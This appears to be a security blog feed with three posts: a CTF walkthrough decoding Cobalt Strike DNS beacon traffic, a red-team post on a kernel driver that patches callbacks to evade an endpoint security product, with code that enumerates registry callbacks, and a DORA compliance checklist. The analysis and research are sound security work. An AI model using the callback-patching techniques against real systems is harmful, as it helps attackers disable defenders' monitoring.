We use a challenge from the 2021 edition of the Cyber Security Rumble to illustrate what Cobalt Strike DNS traffic looks like.

First we need to take a look at the beacon configuration with a configuration extraction tool:

Figure 1: configuration of a DNS beacon

Field “payload type” confirms that this is a DNS beacon, and the field “server” tells us what domain is used for the DNS queries: wallet[.]thedarkestside[.]org.

A third block of DNS configuration parameters is highlighted in figure 1: maxdns, DNS_idle, … We will explain them as they appear in the DNS traffic we are going to analyze.

Seen in Wireshark, that DNS traffic looks like this:

Figure 2: Wireshark view of Cobalt Strike DNS traffic

We condensed this information (field Info) into this textual representation of DNS queries and replies:

Figure 3: Textual representation of Cobalt Strike DNS traffic

Let’s start with the first set of queries:

Figure 4: DNS_beacon queries and replies

At regular intervals (determined by the sleep settings), the beacon issues an A record DNS query for name 19997cf2[.]wallet[.]thedarkestside[.]org. wallet[.]thedarkestside[.]org are the root labels of every query that this beacon will issue; this is set inside the config. 19997cf2 is the hexadecimal representation of the beacon ID (bid) of this particular beacon instance. Each running beacon generates a 32-bit number that is used to identify the beacon with the team server. It is different for each running beacon, even when the same beacon executable is started several times. All DNS requests for this particular beacon will have root labels 19997cf2[.]wallet[.]thedarkestside[.]org.
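As a sketch, the name of such a DNS_beacon query can be constructed in a few lines of Python (the helper name is ours; the domain is the one from this challenge):

```python
def dns_beacon_name(beacon_id: int, domain: str) -> str:
    """Build the name of a DNS_beacon query: the 32-bit beacon ID,
    encoded as 8 hexadecimal digits, prepended to the C2 domain."""
    return f"{beacon_id & 0xFFFFFFFF:08x}.{domain}"

print(dns_beacon_name(0x19997cf2, "wallet.thedarkestside.org"))
# 19997cf2.wallet.thedarkestside.org
```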

To determine the purpose of a set of DNS queries like above, we need to consult the configuration of the beacon:

Figure 5: zooming in on the DNS settings of the configuration of this beacon (Figure 1)

The following settings define the top label per type of query:

  1. DNS_beacon
  2. DNS_A
  3. DNS_AAAA
  4. DNS_TXT
  5. DNS_metadata
  6. DNS_output

Notice that the values seen in figure 5 for these settings, are the default Cobalt Strike profile settings.

For example, if DNS queries issued by this beacon have a name starting with www., then we know that these are queries to send the metadata to the team server.

In the configuration of our beacon, the value of DNS_beacon is (NULL …): that’s an empty string, and it means that no label is put in front of the root labels. Thus, with this, we know that queries with name 19997cf2[.]wallet[.]thedarkestside[.]org are DNS_beacon queries. DNS_beacon queries are what a beacon uses to inquire if the team server has tasks for the beacon in its queue. The reply to this A record DNS query is an IPv4 address, and that address instructs the beacon what to do. To understand what the instruction is, we first need to XOR this replied address with the value of setting DNS_Idle. In our beacon, that DNS_Idle value is 8.8.4.4 (the default DNS_Idle value is 0.0.0.0).

Looking at figure 4, we see that the replies to the first requests are 8.8.4.4. These have to be XORed with the DNS_Idle value 8.8.4.4, thus the result is 0.0.0.0. A reply equal to 0.0.0.0 means that there are no tasks inside the team server queue for this beacon, and that it should sleep and check again later. So for the first 5 queries in figure 4, the beacon has nothing to do.

That changes with the 6th query: the reply is IPv4 address 8.8.4.246, and when we XOR that value with 8.8.4.4, we end up with 0.0.0.242. Value 0.0.0.242 instructs the beacon to check for tasks using TXT record queries.
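The XOR step can be sketched in Python (the function name is ours; the 8.8.4.4 DNS_Idle value is the one recovered from this beacon’s configuration):

```python
import ipaddress

def decode_beacon_reply(reply_ip: str, dns_idle_ip: str) -> int:
    """XOR the IPv4 address of a DNS_beacon reply with the DNS_Idle
    value; the resulting number tells the beacon what to do."""
    reply = int(ipaddress.IPv4Address(reply_ip))
    idle = int(ipaddress.IPv4Address(dns_idle_ip))
    return reply ^ idle

print(decode_beacon_reply("8.8.4.4", "8.8.4.4"))    # 0: no tasks, sleep
print(decode_beacon_reply("8.8.4.246", "8.8.4.4"))  # 242: fetch tasks via TXT
```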

Here are the possible values that determine how a beacon should interact with the team server:

Figure 6: possible DNS_Beacon replies

If the least significant bit is set, the beacon should do a checkin (with a DNS_metadata query).

If bits 4 to 2 are cleared, communication should be done with A records.

If bit 2 is set, communication should be done with TXT records.

And if bit 3 is set, communication should be done with AAAA records.

Value 242 is 11110010, thus no checkin has to be performed but tasks should be retrieved via TXT records.
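The bit rules above can be captured in a small Python sketch (names are ours; behavior for value combinations not described in figure 6 is left as "unknown"):

```python
def decode_instruction(value: int):
    """Interpret the XORed DNS_beacon reply (figure 6): bit 1 (LSB)
    requests a checkin; bits 4 to 2 select the record type."""
    checkin = bool(value & 0b0001)
    if value & 0b0010:
        record = "TXT"
    elif value & 0b0100:
        record = "AAAA"
    elif (value & 0b1110) == 0:
        record = "A"
    else:
        record = "unknown"
    return checkin, record

print(decode_instruction(242))  # (False, 'TXT')
```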

The next set of DNS queries are performed by the beacon because of the instruction (0.0.0.242) it received:

Figure 7: DNS_TXT queries

Notice that the names in these queries start with api., thus they are DNS_TXT queries, according to the configuration (see figure 5). And that is per the instruction of the team server (0.0.0.242).

Although DNS_TXT queries should use TXT records, the very first DNS query of a DNS_TXT transaction is an A record query. The reply, an IPv4 address, has to be XORed with the DNS_Idle value. So here in our example, 8.8.4.68 XORed with 8.8.4.4 gives 0.0.0.64. This specifies the length (64 bytes) of the encrypted data that will be transmitted over TXT records. Notice that for DNS_A and DNS_AAAA queries, the first query is an A record query too. It also encodes the length of the encrypted data to be received.

Next the beacon issues as many TXT record queries as necessary. The value of each TXT record is a BASE64 string, that has to be concatenated together before decoding. The beacon stops issuing TXT record requests once the decoded data has reached the length specified in the A record reply (64 bytes in our example).

Since the beacon can issue these TXT record queries very quickly (depending on the sleep settings), a mechanism is introduced to prevent cached DNS results from interfering with the communication: each name in the DNS queries is made unique with an extra hexadecimal label.

Notice that there is a hexadecimal label between the top label (api in our example) and the root labels (19997cf2[.]wallet[.]thedarkestside[.]org in our example). That hexadecimal label is 07311917 for the first DNS query and 17311917 for the second DNS query. That hexadecimal label consists of a counter and a random number: COUNTER + RANDOMNUMBER.

In our example, the random number is 7311917, and the counter always starts with 0 and increments with 1. That is how each query is made unique, and it also helps to process the replies in the correct order, in case the DNS replies arrive out of order.
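A minimal Python sketch of this cache-busting label (assuming the counter is always a single leading hexadecimal digit, as in the two samples above; the helper name is ours):

```python
def split_unique_label(label: str):
    """Split the cache-busting label into its counter (first digit)
    and the per-session random number (remaining digits)."""
    return int(label[0], 16), label[1:]

print(split_unique_label("07311917"))  # (0, '7311917')
print(split_unique_label("17311917"))  # (1, '7311917')
```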

Thus, when all the DNS TXT replies have been received (there is only one in our example), the base 64 string (ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg== in our example) is decoded and decrypted (we will do this with a tool at the end of this blog post).
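The reassembly and BASE64 decoding step can be sketched as follows (Python; the helper name is ours, and the expected length comes from the earlier A record reply):

```python
import base64

def decode_txt_payload(txt_values, expected_length):
    """Concatenate the TXT record values in query order and
    BASE64-decode them; the result is the encrypted task data."""
    data = base64.b64decode("".join(txt_values))
    assert len(data) == expected_length
    return data

payload = decode_txt_payload(
    ["ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg=="],
    64)
print(len(payload))  # 64
```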

This is how DNS beacons receive their instructions (tasks) from the team server. The encrypted bytes are transmitted via DNS A, DNS AAAA or DNS TXT record replies.

When the communication has to be done over DNS A records (a reply with bits 4 to 2 cleared), the traffic looks like this:

Figure 8: DNS_A queries

cdn. is the top label for DNS_A requests (see config figure 5).

The first reply is 8.8.4.116; XORed with 8.8.4.4, this gives 0.0.0.112. Thus 112 bytes of encrypted data have to be received: that’s 112 / 4 = 28 DNS A record replies.

The encrypted data is just taken from the IPv4 addresses in the DNS A record replies. In our example, that’s: 19, 64, 240, 89, 241, 225, …

And for DNS_AAAA queries, the method is exactly the same, except that the top label is www6. in our example (see config figure 5) and that each IPv6 address contains 16 bytes of encrypted data.

The encrypted data transmitted via DNS records from the team server to the beacon (e.g., the tasks) has exactly the same format as the encrypted tasks transmitted with http or https. Thus the decryption process is exactly the same.

When the beacon has to transmit its results (output of the tasks) to the team server, it uses DNS_output queries. In our example, these queries start with top label post. Here is an example:

Figure 9: beacon sending results to the team server with DNS_output queries

Each name of a DNS query for a DNS_output query, has a unique hexadecimal counter, just like DNS_A, DNS_AAAA and DNS_TXT queries. The data to be transmitted, is encoded with hexadecimal digits in labels that are added to the name.

Let’s take the first DNS query (figure 9): post.140.09842910.19997cf2[.]wallet[.]thedarkestside[.]org.

This name breaks down into the following labels:

  • post: DNS_output query
  • 140: transmitted data
  • 09842910: counter + random number
  • 19997cf2: beacon ID
  • wallet[.]thedarkestside[.]org: domain chosen by the operator

The transmitted data of the first query is actually the length of the encrypted data to be transmitted. It has to be decoded as follows: 140 -> 1 40.

The first hexadecimal digit (1 in our example) is a counter that specifies the number of labels that are used to contain the hexadecimal data. Since a DNS label is limited to 63 characters, more than one label needs to be used when 32 bytes or more need to be encoded. That explains the use of a counter. 40 is the hexadecimal data, thus the length of the encrypted data is 64 bytes long.
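This length decoding can be sketched in Python (the helper name is ours; the first digit counts the data labels, the remainder is the length in hexadecimal):

```python
def decode_output_length(data_label: str) -> int:
    """First DNS_output query: strip the label counter (first digit);
    the remaining hexadecimal digits encode the length of the
    encrypted data that will follow."""
    label_count = int(data_label[0], 16)  # number of data labels (1 here)
    return int(data_label[1:], 16)

print(decode_output_length("140"))  # 64 (0x40 bytes)
```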

The second DNS query (figure 9) is: post.2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.19842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The name in this query contains the encrypted data (partially) encoded with hexadecimal digits inside labels.

These are the transmitted data labels: 2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42

The first digit, 2, indicates that 2 labels were used to encode the encrypted data: 942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3 and 4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.

The third DNS query (figure 9) is: post.1debfa06ab4786477.29842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The counter for the labels is 1, and the transmitted data is debfa06ab4786477.

Putting all these labels together in the right order, gives the following hexadecimal data:

942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b34adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42debfa06ab4786477. That’s 128 hexadecimal digits long, or 64 bytes, exactly like specified by the length (40 hexadecimal) in the first query.
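The label-stripping and reassembly logic can be put together in a Python sketch (the helper name is ours; the input below uses the labels from this example):

```python
def reassemble_output(queries):
    """Each DNS_output query carries data labels; the first digit of
    the first label is the number of data labels in that query.
    Strip the counter digit and concatenate everything in order."""
    chunks = []
    for labels in queries:
        count = int(labels[0][0], 16)
        assert count == len(labels)   # sanity check on the label counter
        chunks.append(labels[0][1:])  # first label minus the counter digit
        chunks.extend(labels[1:])     # remaining labels are pure data
    return "".join(chunks)

hexdata = reassemble_output([
    ["2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3",
     "4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42"],
    ["1debfa06ab4786477"],
])
print(len(hexdata))  # 128 hexadecimal digits = 64 bytes
```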

The hexadecimal data above, is the encrypted data transmitted via DNS records from the beacon to the team server (e.g., the task results or output) and it has almost the same format as the encrypted output transmitted with http or https. The difference is the following: with http or https traffic, the format starts with an unencrypted size field (size of the encrypted data). That size field is not present in the format of the DNS_output data.


We have developed a tool, cs-parse-traffic, that can parse and decrypt both DNS and HTTP(S) traffic. Similar to what we did with encrypted HTTP traffic, we will decode encrypted data from DNS queries, use it to find the cryptographic keys inside the beacon’s process memory, and then decrypt the DNS traffic.

First we run the tool with an unknown key (-k unknown) to extract the encrypted data from the DNS queries and replies in the capture file:

Figure 10: extracting encrypted data from DNS queries

Option -f dns is required to process DNS traffic, and option -i is used to provide the DNS_Idle value. This value is needed to properly decode DNS replies (it is not needed for DNS queries).

The encrypted data (red rectangle) can then be used to find the AES and HMAC keys inside the process memory dump of the running beacon:

Figure 11: extracting cryptographic keys from process memory

Those keys can then be used to decrypt the DNS traffic:

Figure 12: decrypting DNS traffic

This traffic was used in a CTF challenge of the Cyber Security Rumble 2021. To find the flag, grep for CSR in the decrypted traffic:

Figure 13: finding the flag inside the decrypted traffic


The major difference between DNS Cobalt Strike traffic and HTTP Cobalt Strike traffic, is how the encrypted data is encoded. Once encrypted data is recovered, decrypting it is very similar for DNS and HTTP.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Kernel Karnage – Part 5 (I/O & Callbacks)

By: bautersj
30 November 2021 at 10:02

After showing Interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2; however, the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting the functionality from the Evil driver over to Interceptor, added support for patching image load callbacks, and made a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me an insight into handling different aspects of the interaction process between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

+-- Driver
|   +-- Header Files
|   |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
|   |   +-- Globals.h               | contains global variables used in all modules
|   |   +-- pch.h                   | precompiled header
|   |   +-- Interceptor.h           | function prototypes
|   |   +-- Intercept.h             | function prototypes
|   |   +-- Callbacks.h             | function prototypes
|   +-- Source Files
|   |   +-- pch.cpp
|   |   +-- Interceptor.cpp         | driver code
|   |   +-- Intercept.cpp           | IRP hooking module
|   |   +-- Callbacks.cpp           | callback patching module
+-- CLI
|   +-- Source Files
|   |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O via 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. Neither buffered nor direct I/O (METHOD_NEITHER)

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on a per-IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures, which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.
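The transfer method is encoded in the two least significant bits of the IOCTL value itself. As an illustration, here is a Python re-implementation of the Windows CTL_CODE macro (the device type and function number below are arbitrary example values):

```python
# Windows CTL_CODE macro, re-implemented for illustration.
METHOD_BUFFERED, METHOD_IN_DIRECT, METHOD_OUT_DIRECT, METHOD_NEITHER = 0, 1, 2, 3
FILE_ANY_ACCESS = 0

def CTL_CODE(device_type: int, function: int, method: int, access: int) -> int:
    """Pack device type, access, function number and transfer method
    into a single 32-bit IOCTL value."""
    return (device_type << 16) | (access << 14) | (function << 2) | method

IOCTL_EXAMPLE = CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
print(hex(IOCTL_EXAMPLE))    # 0x80002000
print(IOCTL_EXAMPLE & 0b11)  # 0: the I/O manager uses buffered I/O
```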

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

typedef struct _USER_DRIVER_DATA {
    char driverName[256];
    int index;
} USER_DRIVER_DATA;

// user mode application
USER_DRIVER_DATA data;
DWORD lpBytesReturned;
data.index = 1;
strcpy_s(data.driverName, "\\Driver\\MyDriver");
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &data, sizeof(data), nullptr, 0, &lpBytesReturned, nullptr);

// kernel driver
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffer are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//using input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, *PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer with bufferOut = LocalAlloc(LPTR, szBufferOut). This allocates the specified number of bytes (szBufferOut) as fixed memory on the heap and initializes it to zero (the LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040)).

We can then write to this output buffer in our driver using the kprintf() wrapper:

NTSTATUS status = STATUS_SUCCESS;
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
PVOID bufferOut = Irp->UserBuffer;
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added in the image load callbacks registered via PsSetLoadImageNotifyRoutineEx(), which alert a driver whenever a new image is loaded or mapped into memory.

Registry and object creation/duplication callbacks work slightly differently when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.


Instead of going the same route as with the callback arrays, enumerating the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 calls (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). By using CmUnRegisterCallback() instead, we only need to look for a LEA RCX (0x48 0x8D 0x0D) instruction which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
    UNICODE_STRING func;
    RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

    ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

    ULONG64 OffsetAddr = 0;
    for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
        if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
            *(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
            *(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

            OffsetAddr = 0;
            memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
            return OffsetAddr + 7 + instructionAddr;
        }
    }
    return 0;
}

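The displacement arithmetic in the return statement can be illustrated in isolation: a LEA RCX, [RIP+disp32] instruction is 7 bytes long, and the 32-bit displacement is relative to the address of the next instruction. A Python sketch (hypothetical addresses; note that the displacement is signed, so targets before the instruction are reachable too):

```python
def lea_rcx_target(instruction_addr: int, rel32: int) -> int:
    """Resolve the target of a 7-byte RIP-relative LEA RCX, [rip+disp32]:
    the displacement is added to the address of the *next* instruction
    (instruction address + 7)."""
    # sign-extend the 32-bit displacement
    if rel32 & 0x80000000:
        rel32 -= 0x100000000
    return instruction_addr + 7 + rel32

print(hex(lea_rcx_target(0xFFFFF80000001000, 0x100)))  # 0xfffff80000001107
```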
Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;
The registered callback function pointer is located at offset 0x28.

NTSTATUS status = STATUS_SUCCESS;
PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
    }
}

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

DORA and ICT Risk Management: how to self-assess your compliance

By: nicoameye
2 December 2021 at 10:09

TL;DR – In this blogpost, we will give you an introduction to the key requirements associated with the Risk Management Framework introduced by DORA (Digital Operational Resilience Act).

More specifically, throughout this blogpost we will try to formulate an answer to the following questions:

  • What are the key requirements associated with the Risk Management Framework of DORA?
  • What are the biggest challenges associated with these requirements?
  • How can you prepare yourself, and what actions should you take to align your organization with the Risk Management Framework requirements?

In the following sections, we will share our thoughts on how to self-assess your compliance on this requirement. If this self-assessment checklist is of interest to you, you can find it in Excel format in our GitHub repository.

What are the ICT Risk Management requirements?

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

Chapter 2 – Section 1 – Risk management governance

The first part of Chapter 2 addresses the risk management governance requirements. They include, but are not limited to, setting roles and responsibilities of the management body, planning and periodic auditing.

This section states the responsibilities of the management body for the definition, approval and oversight of all arrangements related to the ICT risk management framework.

This section also defines the role of ICT third-party Officer, a position in charge of defining and monitoring all the arrangements concluded with ICT third-party service providers on the use of ICT services.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 4 – Governance and organisation

  • Responsibilities of the management body: The management body shall define, approve, oversee and be accountable for the implementation of all arrangements related to the ICT risk management framework.
  • ICT third party Officer: The role of ICT third party Officer shall be defined to monitor the arrangements concluded with ICT third-party service providers on the use of ICT services.
  • Training of the management body: The management body shall, on a regular basis, follow specific trainings related to ICT risks and their impact on the operations.

Chapter 2 – Section 2 – Risk management framework

The second part of Chapter 2 introduces the ICT risk management framework itself as a critical component of the regulation.

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving, and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus DORA does not impose specific standards itself.

Before exploring the functions, let’s note that DORA specifies several governance mechanisms around the risk management framework. They include, but are not limited to, setting the objectives of the risk management framework, planning and periodic auditing.

The following table provides a checklist for financial entities to self-assess their compliance on these governance requirements:

Article 5 ICT risk management framework
Protecting physical elements Entities shall define a well-documented ICT risk management framework which shall include strategies, policies, procedures, ICT protocols and tools which are necessary to protect all relevant physical components and infrastructures
Information on ICT risks Entities shall minimise the impact of ICT risk by deploying appropriate strategies, policies, procedures, protocols and tools
ISMS Entities shall implement an information security management system based on recognized international standards
Three lines of defence  Entities shall ensure appropriate segregation of ICT management functions, control functions, and internal audit functions
Review The ICT risk management framework shall be reviewed at least once a year, as well as upon the occurrence of major ICT-related incidents
Improvement The ICT risk management framework shall be continuously improved on the basis of lessons derived from implementation and monitoring
Audit The ICT risk management framework shall be audited on a regular basis by ICT auditors 
Remediation Entities shall define a formal follow-up process for the timely verification and remediation of critical ICT audit findings
ICT risk management framework objectives The ICT risk management framework shall include the methods to address ICT risk and attain specific ICT objectives


Identification

Financial entities shall identify and classify the ICT-related business functions, information assets and supporting ICT resources, on the basis of which risks posed by current cyber threats and ICT vulnerabilities are identified and assessed.

The following table provides a checklist for financial entities to self-assess their compliance on the Identification requirement:

Article 7 Identification 
Asset Identification Entities shall identify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification  Entities shall classify and adequately document:
(a) ICT-related business functions
(b) Information assets supporting these functions
(c) ICT system configurations and interconnections with internal and external ICT systems
Asset Classification Review  Entities shall review as needed, and at least yearly, the adequacy of the classification of the information assets 
ICT risks Identification and Assessment  Entities shall identify all sources of ICT risks, and assess cyber threats and ICT vulnerabilities relevant to their ICT-related business functions and information assets. 
ICT risks Identification and Assessment Review Entities shall regularly review the ICT risks Identification and Assessment yearly or upon each major change in the network and information system infrastructure
ICT mapping Entities shall identify all ICT systems accounts, the network resources and hardware equipment
(a) Entities shall map physical equipment considered critical
(b) Entities shall map the configuration of the ICT assets and the links and interdependencies between the different ICT assets. 
 ICT third-party service providers identification Entities shall identify all ICT third-party service providers
(a) Entities shall identify and document all processes that are dependent on ICT third-party service providers
(b) Entities shall identify interconnections with ICT third-party service providers.
 ICT third-party service providers identification review Entities shall regularly review the  ICT third-party service providers identification
Legacy ICT systems Entities shall on a regular basis, and at least yearly, conduct a specific ICT risk assessment on all legacy ICT systems

This ICT risk management framework shall include the identification of critical and important functions as well as the mapping of the ICT assets that underpin them. Moreover, this ICT risk management framework shall also include the assessment of all risks associated with the ICT-related business functions and information assets identified.

What to identify and assess? Well …

  • ICT-related business functions
  • Information assets supporting these functions
  • ICT system configurations
  • Interconnections with internal and external systems
  • Sources of ICT risk
  • All ICT system accounts
  • Network resources and hardware equipment
  • Critical physical equipment
  • All processes dependent on and interconnections with ICT third-party service providers

Protection and Prevention

Financial entities shall (based on the risk assessment) set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT security strategies, policies, procedures and appropriate technologies.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 8 Protection and Prevention 
CIA Entities shall develop and document an information security policy defining rules to protect the confidentiality, integrity and availability of their own and their customers’ ICT resources, data and information assets; 
Segmentation Entities shall establish a sound network and infrastructure management using appropriate techniques, methods and protocols including implementing automated mechanisms to isolate affected information assets in case of cyber-attacks
Access privileges Entities shall implement policies that limit the physical and virtual access to ICT system resources and data and establish to that effect a set of policies, procedures and controls that address access privileges
Authentication mechanisms Entities shall implement policies and protocols for strong authentication mechanisms and dedicated controls systems to prevent access to cryptographic keys 
ICT change management  Entities shall implement policies, procedures and controls for ICT change management including changes to software, hardware, firmware components, system or security changes. The ICT change management process shall be approved by appropriate lines of management and shall have specific protocols enabled for emergency changes. 
